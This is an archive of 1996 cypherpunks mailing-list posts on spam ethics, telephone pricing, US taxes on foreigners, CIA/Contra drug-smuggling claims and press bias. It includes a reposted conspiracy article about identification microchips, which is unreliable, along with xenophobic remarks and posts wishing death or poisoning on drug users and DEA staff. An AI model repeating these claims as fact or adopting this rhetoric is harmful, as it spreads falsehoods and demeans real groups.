MIME-Version: 1.0
Content-Type: text/plain


Ross Wright writes:
>On Or About 20 Aug 96, 18:09, Rich Graves wrote:
>
>> On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
>> 
>> > I don't know if there has been much discussion on the ethics of
>> > spamming here? Is spamming free speech? 
>> 
>> Yes.
>> 
>> So is mailbombing the motherfucker, or more productively, virtually
>> picketing his ISP until they kick him off for net abuse
>
>That is the kind of self righteous crap that gives me the creeps!!!

So civily dealing with a net abuser gives you the creeps?  THAT gives ME the 
creeps, honestly.

>> 
>> Ethically? We don't talk ethics much here, but I'd say it's highly
>> unethical to abuse a service paid for by the pooled resources of
>> many. 
>
>I pay for my net access.  I pay for my Sunday paper, it's full of ads 
>too!!  Ethics???  Let's rat out on the EVIL spammers!!  Let's turn 
>them into thier ISP!!!  That's a load of CRAP!!!!

We /all/ pay for our access.  Most of us work, most of us pay for the paper,
most of us put up with ads.  Spam is the price of free speech.  One must 
either, in minor cases, ignore it and move on, so as not to encourage; or, in
case of extravagent abuse, send word to the isp, spread the word on the net
that xxx.com is a spammer's haven (and otherwise discouraging further 
memberships), as well as filling the sysadmin's mailbox until the spammer is
deleted and we can all move on again.

It's not a load of crap, it's reality.  Everything provided for civil use and
enjoyment will be abused repeatedly, it's all in how we deal with it.

Greetings from $hell,
Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Wed, 21 Aug 1996 20:55:35 +0800
To: rwright@adnetsol.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608210740.DAA28118@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Ross Wright writes:
>On Or About 20 Aug 96, 16:23, Jim Gillogly wrote:
>> 
>> Vipul Ved Prakash <vipul@pobox.com> writes:
>> >I don't know if there has been much discussion on the ethics of
>> >spamming here? Is spamming free speech? 
>> 
>
>> I oppose spamming because it's rude and inefficient, lowering the
>> S/N everywhere it happens.  Market droids
>
>Market Droids????  As a salesman I take offence at this slur.

Well, look at it from the consumer point of view.  We log on, and see what is
eccentially a junk-email, written as a form letter, sitting in our box.  It's
gotten to the point were I have barely enough patience to skim my junk before
I delete it, just to be fair.  So, to most of it, it seems quite droidlike.  
If you want people referring to it in a more respectable manner, earn more
respect.  Do a more personalized canvass, or find better ways to advertise,
other than junk email.  You'll piss less people off, and get more respect.

>> favor it because it's
>> cheap, and no matter how many people they piss off bigtime, they
>> make some sales.
>
>Even make sales to people who are pissed off at first...

That doesn't make it right, in my opinion.  It just makes it worse, because
salesmen will not consider how annoying their canvass is to people before 
sending it out, and more and more people get pissed.  Selling is no 
justification, the ends do not justify the means.  People are still angered.
After all, you are not counting how many pissed off people you do NOT sell to.

Greetings from $hell,
Daniel.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 21 Aug 1996 14:48:27 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Phoneco vs X-Phone
In-Reply-To: <199608192246.PAA08982@mail.pacifier.com>
Message-ID: <199608210402.EAA00558@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> What do you mean, "doesn't really fit the facts"?!?  What part of it was 
> incorrect?  Fiber-optic _is_ commonly used in inter-office trunks, right?  
> It doesn't wear out, right?  Higher usage doesn't entail greater costs, 
> right?  The capacity, while not strictly infinite, is high enough so 
> expanded usage doesn't strain most links, right?  Finally, modern phone 
> switches have sufficient connect capacity so that they can handle usage 
> which would have been considered "unusual" by yesteryear's standards.  All 
> of this points to an obvious conclusion:  Telephone companies do not, in 
> general, have increased costs as a consequence of increased telephone usage.
> 
> Here's what I think is _really_ going on:  You have decided that you think 
> the costs of the telephone system should be apportioned by usage EVEN IF 
> higher usage is no more costly to provide.  That's why you don't want to  
> disprove my claims.  You're afraid that you'll have to say, "Yes, you're 
> right Jim, but I _still_ think billing should be porportional to use."

No ulterior motives, Jim. Cool Down :)
Now lets see, you say we have enough capacity out there, alright, but then
why is everyone raving about "a slow internet". We all know in IT 640K
is never enough, niether is 640Mb. At some point in time, new cables
_have_ to be laid. Moreover you seem to be considering a static growth rate,
but we all know the Internet is nothing short of a big-bang. 

I am trying to debate a model rather than numbers and in which case its
important to to consider a long-term scenario.

This reminds me of a survey on a "proposed Rural Telecom Network" back in 
India, which finally decided that ROI will not justify the project
even in 20 years time. 

> Some of whom are probably unnecessary.  Interestingly enough, the rumor is 
> that half the costs for LD are in billing and customer service.  Most of 
> these costs would disappear if LD was unmetered.  
> 
> >
> >> >But you miss my point, if a phoneco is not getting a penny for its long 
> >> distanceservices (which subsidise the flat rate local calls) then the 
> choice would be to close down. Which would be a severe attack to the 
> local internet usage.
> >> 
> >> That's an entirely unsupported claim.  Nobody claims that telephone usage 
> >> (term used generically) is on the way out.  "Closing down" is only going to 
> >> happen if local phonecos cease to be able to provide a service that people 
> >> are willing to pay for.
> >
> >Exactly! Once "X-Phone" has its servers in US Cities, and its charging 10 
> cents 
> >a minute for long distance calls, I don't see if the phonecos would be able 
> to provide any service that people are willing to pay for, I mean they won't
> >be able to provide matching lucrative rates. 
> 
> I am confident that local phonecos can remain competitive even against 
> "free" Internet telephone service.  What they need to do is simple:  
> Entirely remove the LD/local subsidy, remove metering on LD (as well as 
> local), bill yearly for far lower costs, etc.  Once this is done, LD will be 
> "free", at least on a marginal basis, so no customer will have any 
> motivation to move to "Internet telephone" service.
> 
> 
> >You mean to say that, X-Phone will take advantage of the phoneco and mint 
> >money for a minimal investment, whereas the phoneco who spent billions on the
> >infrastructure will be just whistle down the road, and let the X-Phone 
> >indulge in its own cyberdo.
> 
> In the US, the current telephone company infrastructure is ALREADY PAID FOR. 
>  It was paid for by over-inflated rates during a monopolized era.   If 
> anything, the locals have an "unfair advantage" over the rest of the 
> companies:  Only they have a copper pair into every home.  

Alright, once again I try to show what exactly I am pointing at. Alice uses
the phone 23 hrs a day, Bob uses 10 mins, both get their connections
from ABCTel. The bandwidth with ABCTel saturates and it has to buy more 
bandwidth (if ABCTel is a babybel, it will be buying it from a BigBell,
and whether or not bandwidth exists is quite besides the point here)
Its because of subscribers like Alice ABCTel is buying more bandwidth,
and the flat rate revenues generated by addition of a couple of members won't 
justify the new bandwidth. 

Flat rates are based on the assumption that a subscriber will use the service
for X amount of time. Since the phoneco has no control over user behaviour,
more that reasonable number of Alice-type clients will screw up the phonecos 
economics.

With explosion of Internet, people have found a new way of using their phone
line, and all these companies are already in trouble. To top all that we
are loudly professing the Internet (ultra-low-cost) solutions to LD Calls
with phoneco. 


- Vipul
vipul@pobox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 21 Aug 1996 09:00:53 +0800
To: cypherpunks@toad.com
Subject: Spamming (Good or Bad?)
Message-ID: <199608210407.EAA00568@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


I don't know if there has been much discussion on the ethics of spamming
here? Is spamming free speech? 

- Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 21 Aug 1996 22:10:42 +0800
To: cypherpunks@toad.com
Subject: Re: US Taxes on X-Pats (getting off topic)
In-Reply-To: <1.5.4.32.19960820173846.007137e4@iu.net>
Message-ID: <199608211156.GAA09206@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <1.5.4.32.19960820173846.007137e4@iu.net>, on 08/20/96 at 01:38 PM,
   Stephen Cobb <stephen@iu.net> said:

>Very true...what I am saying is that, as far as my reading goes, LEGAL
>aliens are going to be required to pay social security "taxes" while not
>having any "entitlement" in return. They pay income taxes and get certain
>things, like law and order, in return. They will be paying soc sec money to
>the government without getting anything in return. This sounds not only
>unfair but wrong, part of an isolationist, "we killed the natives so this
>land is our land and the rest of you f@*k-off" revival that includes the
>recent posting about requiring proof of citizenship before issuing drivers
>licenses.

So what?

I can gaurentee that I will never see any "entitlement" (not that I believe that there is any entitlements in life other than death & taxes) in return for the taxes I pay (at 50% income no less). IMHO no non-US citizen has a right to one thin dime of my tax dollars. Period no exceptions. Don't like it PISS OFF and go back to whatever stink hole you came from. 

I for one am sick and tired of politions cow-towing to a bunch of special intrest groups who don't even represent US citizens. If they can't support themself when they come to this country then they need to stay where they are. We have plenty of home grown dead beats sucking off the government tit without shipping them in.

Now on the driver licenses. Every state requires some type of ID to get one (ie birth certificate, ss#, prof of resedency, ..ect). Should you have to be a citizen to get one? No, with the exception of those living inside a large metropoliten area (Chicago,NewYork,L.A.) a car is a requirment. Trust me I've lost my license and you would not beleive what a hassel it is just to get back and forth to work or the store without one. IMHO unless you are out killing people with your car the state should
not be allowed to take away your driver license. Especialy for such trivial matters as too many speeding tickets, not to mention all the non-driving related reasons the state can suspend your license for (in Florida non payment of child support is good enough reason).

P.S.: We did kill off all the natives and it IS our country. This county was founded to get away from all the European crap and I see no reason 200 years later we should be working to make this country as F@#$ed up as they are.

Well that's my $0.02 worth. :)


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->Air conditioned environment - Do not open Windows.
 
MR/2 Tag->Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 21 Aug 1996 17:26:42 +0800
To: Rich Graves <rich@c2.org>
Subject: the number of the the beast is [666] (was: CIA Contra Crack and LA Gangs)
Message-ID: <199608210700.BAA07366@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Rich Graves <rich@c2.org>
              Cypherpunks <cypherpunks@toad.com>

I'll see your bet...  and raise you five....


 THE MARK OF THE BEAST

        "He causes all, both small and great, 
        rich and poor, free and slave, 
        to receive a mark in  their right hand 
        and in their foreheads, and that no one 
        may buy of sell except one who has the 
        mark or the name of the Beast, 
        or the number of his name"

                Revelation 13:16-17

The following article appeared in Nexus magazine Vol 2, No.20:


        The Microchip and the Mark of the Beast

Dr Carl W. Sanders is an electronics engineer, inventer, author
and consultant to various government organisations as well as
IBM, General Electric, Honeywell and Teledyne.  He is also a
winner of the Presidents and Governors Award for Design
Excellence.

"Thirty two years of my life was spent in design engineering and
electronics designing microchips in the Bio-Med field.

"In 1968 I became involved, almost by accident, in a research and
development project in regard to a spinal bypass for a young lady
who had severed her spine.  They were looking at possibly being
able to connect motor nerves etc.

"It was a project we were all excited about.  There were 100
people involved and I was senior engineer in charge of the
project.  This project culminated in the microchip that we talk
about now a - microchip that I believe is going to be the
positive identification and mark of the beast.

"This microchip is recharged by body temperature changes.
Obviously you can't go in and have your battery changed every so
often, so the microchip has a recharging circuit that charges
based upon the body temperature changes.  Over one and a half
million dollars was spent finding out that the two places in the
body that the temperature changes the most rapidly are in the
forehead (primary position), right below the hairline, and the
back of the hand (alternative position).

"Working on the microchip, we had no idea about it ever being an
identification chip.  We looked at it as beig a very humanitarian
thing to do.  We were all excited about what we were doing.  We
were doing high-level integration for the very first time.  This
team was made up of people out of San Jose, people fron
Motorolla, General Electric, Boston Medical Center - it was quite
a group of people.  My responsibility had to do with the design
of the chip itself, not the medical side of if.

"As the chip came to evolve, there came a time in the project
when they said that the financial return on bypassing severed
spines is not a very lucrative thing for us to be into, so we
really need to look at some other areas.  We noticed that the
frequency of the chip had a great effect upon behaviour and so we
began to branch off and look possibly at behaviour modification.

"The project almost turned into electronic acupuncture because
what they ended up with was embedding the microchip to put out a
signal which effected certain areas.  They were able to determine
that you could cause behavioural change.

"One of the projects was called the Phoenix project which had to
do with Vietnam veterans.  We had a chip that was called the
Rambo chip.  This chip would actually cause extra adrenaline
flow.

"I wonder how many of you know that if you can stop the output of
the the pituitary gland (the signal from the pituitary gland that
causes oestrogen flow), you can put a person into instant
menopause and there is no conception.  This was tested in India
and other different parts of the world.  So here you have got a
birth control tool, based on a microchip.  Microchips can also be
used for migraine headaches, behaviour modification,
upper/downer, sexual stimulant and sexual depressant.  This is
nothing more that electronic acupuncture, folks.

"There are 250,000 components in the microchip, including a tiny
lithium battery.  I fought them over using lithium as a battery
source but NASA was doing alot with lithium at that time and it
was the going thing.  I had talked to a doctor at the Boston
Medical Center about what that concentration of lithium in the
body could do if the chip broke down.  He said that you would get
a boil or grievous sore.

"As the development moved along, I left the project and came back
as a consultant several times.  I was used in many meetings as an
expert witness in regard to the uses of the microchip.

"I was in one meeting where it was discussed.  How can you
control a people if you can`t identify them ?"  All of a sudden
the idea came:  "Lets make them aware of lost children, etc."

"This was discussed in meetings almost like people were cattle.
The CIA came up with an idea of putting pictures of lost children
on milk cartons.  Since the chip is now accepted, you don`t see
the pictures anymore, do you.  It's served it's purpose.

"As we developed this microchip, as the identification chip
became the focal point, there were several things that were
wanted.  They wanted a name, an image (picture of your face),
Social security number with the international digits on it,
finger print identification, physical description, family
history, address, occupation, income tax information and criminal
record.

"I've been in 17 "one world" meetings where this has been
discussed, meetings in Brussels, Luxembourg, tying together the
finances of the world.

"Just recently in the newspapers they`ve talked about the Health
Care Program, the "Womb to Tomb" identification!  A positive
identification.  There are bills before congress right now that
will allow them to inject a microchip in your child at the time
of birth for identification purposes.

"The president of the United States of America, under the
"Emigration of Control Act of 1986", Section 100 , has the
authority to deem whatever type of identification is necessary -
whether it be an invisible tattoo or electronic media under the
skin.  So I think you have to look at the facts, folks:  this is
not coming as some big shock.  The paving has been done ahead of
time."


--
"The road to tyranny, we must never forget, begins with the
destruction of the truth." 
        -- Bill Clinton, Oct. 15, 1995 at the University of Connecticut.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 21 Aug 1996 22:30:34 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820174341.11228F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.960821065233.19473A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Aug 1996, Rich Graves wrote:

> On Tue, 20 Aug 1996, Brad Dolan wrote:
> 
> > Goofy guy agrees with Morris about X, therefore Morris' well-documented 
> > claims about X and Y are false? 
> 
> Lots of footnotes to "confidential interview" do not make a valid study. How
> many "well-documented" studies of the Kennedy assassination and UFO
> sightings have you read? 
> 
> I followed this wild goose chase to exhaustion back in 1986-7. I've
> forgotten most of it, but I'm sure I have some notes and maybe some tapes
> lying around. Yes, some contras and some sandinistas and some martistas and
> *lots* of the senderos and M-19 ran drugs. That's what happens when you
> criminalize a political movement -- political figures become criminals in
> order to survive. (When the crime they're involved is simply free trade in
> criminalized agricultural products, it just adds another layer of irony.)
> 

Those products should be legalized of course - but that would deprive the 
CIA etc. of a nice hidden source of income.


> There's a kernel of truth and plausibility to most conspiracy theories,
> including this one. (It's a big mistake to say *all* conspiracy theories.) 
> However, the money involved was rather small, the process was basically skew
> to politics (both sides did it all), and I have never been convinced that
> the CIA -- or even North's coterie in the NSC, which as you know ran a
> number of ops that the CIA would never have gone for -- was in on it. 
> 

If you don't believe the principled left (Morris, etc.), the principled 
right (Tyrell, etc.), the mainstream media (see below), or my personal 
local observations, I think you've made up your mind and are beyond 
convincing.

> (ObConspiracy: H. Ross Perot actually was involved in funneling money to the
> contras. He was rather open and proud of it. Is he mentioned in Morris's
> book?)

Briefly.

bd

> 
> -rich
> 
> 

Wall Street Journal, 5/3/94, Letter to the Editor

STILL A STRONG SCENT ON THE MENA TRAIL

We are glad that Edward Jay Epstein saw the CBS News report on Mena, 
Ark., which he discussed in his April 20 editorial-page piece.  "On the 
Mena Trail."  Our story, like others on Mena, raised questions.  They 
won't be answered until reporters follow the money - millions of dollars 
generated out of the operations at Mena.  That could either put it to 
rest, or lead to a story at least as important as Whitewater.

The original report on Whitewater by Jeff Gerth of the New York Times was 
ignored for many months.  The Mena story probably will suffer the same 
fate unless other journalists pick up the trail.  That might not happen 
if readers conclude, as Mr. Epstein seems to, that the only place Mena 
could lead is to Whitewater. What if Mena has nothing to do with Whitewater?

Our sources agree with Mr. Epstein on a number of things:  There was most 
likely a CIA-sponsored Contra operation run out of Mena, as well as a 
huge parallel cocaine-smuggling operation, money laundering, and a 
Justice Department coverup.  Much of this happened on Mr. Clinton's watch 
as governor.

But Mr. Epstein says that after smuggler Barry Seal was killed there was 
really no one else to go after.  Investigators never targeted Mr. Seal.  
They knew he was working for the federal government and was therefore 
untouchable.  Instead, they targeted Seal's associates - the bankers and 
businessmen who allegedly laundered his drug profits and illegally modified
his planes so he could smuggle tons of cocaine into the U.S. They were 
never prosecuted by either the federal government or the state of Arkansas.

Mr. Epstein says that no one is claiming that Mr. Clinton blocked legal 
proceedings in this matter.  But as the CBS News story revealed, Mr. 
Clinton was asked by a state prosecutor for help to pursue the case 
against Seal's associates.  Help was promised but never arrived.

Arkansas Rep. Bill Alexander tried to save and then re-start an 
investigation of Mena.  Mr. Clinton did not seize on this issue and offer 
support, despite the fact that a Republican administration was apparently 
sponsoring a Contra aid operation in his state and protecting a smuggling 
ring that flew tons of cocaine through Arkansas.

Mr. Epstein suggests there is no reason to believe Mr. Clinton knew 
about Mena.  But the governor's own state police began investigating at 
Mena in 1984.  Isn't it reasonable to assume that he was made aware of 
the investigation?  Mr. Clinton did acknowledge learning about Mena as 
early as April 1988; Ross Perot, who had done his own investigation of 
Mena, was concerned enough about the drugs-for-guns operation to call Mr. 
Clinton.  And former Clinton staff people have told CBS News that the 
governor was aware of what was going on there.

Mena is a perplexing and difficult story.  There is a trail - tens of 
millions of dollars in cocaine profits, and we don't know where it 
leads.  It is a trail that has been blocked by the National Security Council.

The FAA, FBI, Custons, CIA, Justice, DEA and the IRS were all involved in 
Mena.  They won't say how they were involved, but they will tell you 
there is nothing there.

Bill Plante, CBS News Correspondent
Michael Singer, Producer, CBS News
New York




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 21 Aug 1996 22:06:53 +0800
To: cypherpunks@toad.com
Subject: Re:Edited Edupage, 18 Aug 1996
In-Reply-To: <v02140b03ae4078d022b7@[204.179.131.38]>
Message-ID: <v0300780cae40a1df1e84@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:35 AM -0400 8/21/96, Jim McCoy wrote:
> The big problem is that no one has data that is worth protecting enough to
> make such a venture pay off.

Well, maybe not yet.

An overnight backup copy of a $10 million foreign exchange banknote might.

$2 trillion in FX trxes a day, folks...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Wed, 21 Aug 1996 23:23:37 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE]CIA Contra Crack and LA Gangs (fwd)
Message-ID: <199608211235.IAA30204@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Aug 21 08:35:15 1996
Rich Graves wrote:

> On Tue, 20 Aug 1996, Jim Ray wrote:

...

> Oh, I don't think it's impossible or even unlikely that at least
>  some of the
> groups lumped together as "contras" were involved in drug
>  smuggling, and I
> think it's reasonable to have different views regarding how much
>  money was
> involved and who knew what when (my view is very little, and
>  medium). 

Anyone who says "very little" money is involved in any aspect of 
the cocaine importation trade definitely doesn't live in Miami.

>What I
> object to are conspiracy theories along the lines of: 
> 
> 1. The Reagan Administration used the Contras to smuggle crack
>  to the US in
>    a deliberate attempt at genocide against Black people. (I
>  heard this a
>    lot, though seldom in so many words, on KPFK in the mid-80's;
>  the SJ Merc
>    series certainly has this as a subtext.)

I never said that, and I object to calling something a "conspiracy 
theory" just because it's politically inconvenient. People in power 
conspire to get rich and stay in power. Sometimes they use laws 
they write and sometimes they break laws they wrote. This is a fact 
of life, not a conspiracy theory.

> 2. Clinton was a CIA agent involved in the Contra drug-smuggling
>  CaBaL.

He was governor of Arkansas when Reagan was President of the United 
States. Do the search I already gave you, and read the articles.
mena /p cocaine

...

> > It is a major, bipartisan, Watergate-style but bigger 
> > scandal, and the strange bedfellows in the media who were
>  doing a 
> > halfway decent job of covering it [The Wall Street Journal and
> > "High Times" magazine(!)] have fallen strangely silent on the
> > subject as the election approaches. Hmmmmm.
> 
> 4. Anything where vague unsupported asserions are thrown out,
>  followed by
>    a Hmmmmm (sorry).

OK, looks like I have to say it again, and remember this is NOT me, 
it's those conspiracy theorists at CBS News, printed in that 
radical purveyor of vague unsupported asserions...The Wall Street 
Journal:

"The FAA, FBI, Customs, CIA, Justice, DEA and the IRS were
all involved in Mena. They won't say how they were involved,
but they will tell you there is nothing there." -- Bill Plante,
CBS News Correspondent, &  Michael Singer, Producer, CBS News,
New York. [In Tuesday, May 3, 1994's  Wall Street Journal
letters to the editor section.] Look it up.

I am not a journalist, but it sometimes seems I have a better 
institutional memory than they do. This story was covered poorly, 
even though there was/is plenty there, because of politics and 
power masquerading as "national security." The story is there for 
journalists who want to risk covering it, but the trail is getting 
cold, and yes, some loons have latched onto it, due in part to the 
vacuum in "legitimate" media coverage.
[This will be my final word on this subject in this forum.]
<sound of Perry cheering>
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"'Filegate' is starting to make _Ed_ _Meese_ look ethical."
 -- me
 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray 
Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhsCim1lp8bpvW01AQHsYQP+JeN4t0Cd/d+Woy0eyvvVtCHy//RoSWJI
K3gWOAHTMB71xZDKu7qbuUMRBs1nsFv2dlvYlKMIJLxn9Bl2H+13IpOsYTtPntg+
r+YOPazgwVVm8wNICEekdKjki9MaiTj1AFIX2P2LbVp7EZkmQIwxJfkYZituWNIy
LNFZyOGhVaQ=
=b3jZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 21 Aug 1996 12:08:11 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.SV4.3.91.960820191108.9214E-100000@larry.infi.net>
Message-ID: <199608210005.KAA12548@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> I wish they'd get back in the business, but add an overt poison to the 
> product.
> 
> Clean out the shit from the cities. Long live Darwinism.

Darwinism is working as well as it ever was. You may not like it, but
shit is being selected for.


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Wed, 21 Aug 1996 23:30:40 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820174341.11228F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.HPP.3.91.960821143553.10644B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Rich Graves wrote:

> lying around. Yes, some contras and some sandinistas and some martistas and
> *lots* of the senderos and M-19 ran drugs. That's what happens when you
> criminalize a political movement -- political figures become criminals in
> order to survive. (When the crime they're involved is simply free trade in
> criminalized agricultural products, it just adds another layer of irony.)

But also many 'legitimate' political movements in South American countries
engage in the cocaine trade (the President of Colombia etc). And why
shouldn't they. Here, the South countries at least have one commodity that
is highly prized in the North countries. It's very bad economy not to profit
from this.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Elf" <cwalker@erie.net>
Date: Thu, 22 Aug 1996 16:13:41 +0800
To: "Rich Graves" <cypherpunks@toad.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608220615.CAA24044@moose.erie.net>
MIME-Version: 1.0
Content-Type: text/plain




----------
> From: Rich Graves <rich@c2.org>
> To: cypherpunks@toad.com
> Subject: Re: Husband/Wife jailed for saying Clinton Sucks
> Date: Wednesday, August 21, 1996 5:12 AM
> 
> On Tue, 20 Aug 1996, Z.B. wrote:
> 
> > Published in Washington, D.C.   July 9, 1996
> > Insult to Clinton leads to 2 arrests
> > 
> > ------------------------------------------------------
> > By Ruth Larson
> > THE WASHINGTON TIMES
> > ------------------------------------------------------
> 
> I think you should try a more credible paper. Say, Scientology's Freedom
> Magazine, rather than the Moonies'. You are of course free to believe
> whatever you wish.
> 
> -rich

Actually it very well could of happened.  I am ex-Navy and for military
peronell it is made clear that anyone military or not that slanders,
degrades, or in any way threatens or degrades the President (commander in
chief) is subject to arrest, imprissionment and/or fines.  Of course this
usually doesnt happen cause only the real wacked out Clinton rules gov.
employees would enforce this.  But you never know!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 05:47:07 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608211530.IAA14072@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 AM 8/21/96 -0700, Rich Graves wrote:
>On Tue, 20 Aug 1996, Z.B. wrote:
>
>> Published in Washington, D.C.   July 9, 1996
>> Insult to Clinton leads to 2 arrests
>> By Ruth Larson
>> THE WASHINGTON TIMES
>> ------------------------------------------------------
>
>I think you should try a more credible paper. Say, Scientology's Freedom
>Magazine, rather than the Moonies'. You are of course free to believe
>whatever you wish.

At this point, I think the Washington Times has far more credibility than 
the Washington Post.  While I'm, likewise, not particularly happy with the 
Times' ownership, I doubt whether stories like this ever appear in the Post. 
 (You tell me:  Did this story ever appear in the Post?)

The Net public is getting less and less tolerant of obvious bias on the part 
of those who report the news.  The Times has some potential (undisplayed) 
bias that we need to be on the lookout for, but the Post is actively 
engaging in bias in its news stories, NOW.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 02:54:15 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
Message-ID: <199608211539.IAA14733@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 AM 8/21/96 -0400, Chip Mefford wrote:

> The DEA may not actually be the "Good" Guys, but there are some much worse
>out there

Whatever "worse guys" are out there, the vast majority of which would become 
de-fanged almost instantly on the legalization of currently-illegal drugs.

Given a choice between wishing for the death of everyone in the DEA, or 
everyone the DEA claims to object to, I'd off the DEA is a second.  It's an 
organization which guarantees the existence of its own opposition.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 22 Aug 1996 03:22:18 +0800
To: cypherpunks@toad.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <4vb5ud$skn@abraham.cs.berkeley.edu>
Message-ID: <4vfapu$e48@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.GSO.3.93.960820100154.11840A-100000@nebula>,
=?ISO-8859-1?Q?J=FCri_Kaljundi?=  <jk@stallion.ee> wrote:
> 19 Aug 1996, Ian Goldberg wrote:
>
>> >  No, we will only be supplying ELF.  Since linux is not officially
>> >supported, we really don't have the resources to do multiple versions.
>> >
>> Not to mention that plugins are virtually impossible with a.out...
>
>You really think someone will write plug-ins for Unix versions of
>Netscape? I am not so sure.
>
Yes, I'm positive of it, mainly because _I_ will, especially for Linux.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhsueUZRiTErSPb1AQHsUQP+N52PAk5t6/r4JYyudgIuyLL1+SCGdaMo
6QgHm6GMqiHwfudVgERUJ+aM6no1Soc/KozTHhdVS/Od4qtoBo2B9Pekhw8+O4Cj
